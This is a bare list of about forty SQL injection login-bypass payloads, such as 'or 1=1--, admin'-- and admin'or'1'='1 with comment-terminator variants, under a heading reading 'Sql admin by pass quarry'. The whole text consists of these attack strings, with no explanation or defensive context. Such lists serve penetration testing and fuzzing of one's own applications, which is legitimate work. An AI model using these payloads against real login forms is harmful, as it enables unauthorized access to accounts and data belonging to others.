'=''or'
'or''-'
'or'''
'or''&'
'or''^'
'or''*'
'or 1=1 limit 1-- -+
"or""-"
"or"" "
"or""^"
"or""*"
or true--
") or true--
'or true--
")or true--
"or 'x'='x
") or ('x')=("x
"))or(("or))=(("x
1=1 or 1=1--
or 1=1#
or 1=1/*
admin'--
admin"--
admin'#
admin'/*
admin'or'1'='1
admin'or'1'='1'--
admin'or'1'='1'#
admin'or'1'='1'/*
admin'or 1+1 or "="
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*


Sql admin  by pass quarry
0'or'0'='0
' or 1=1 limit 1 -- -+
'="or' 
1'or'1'='1
'or' '='

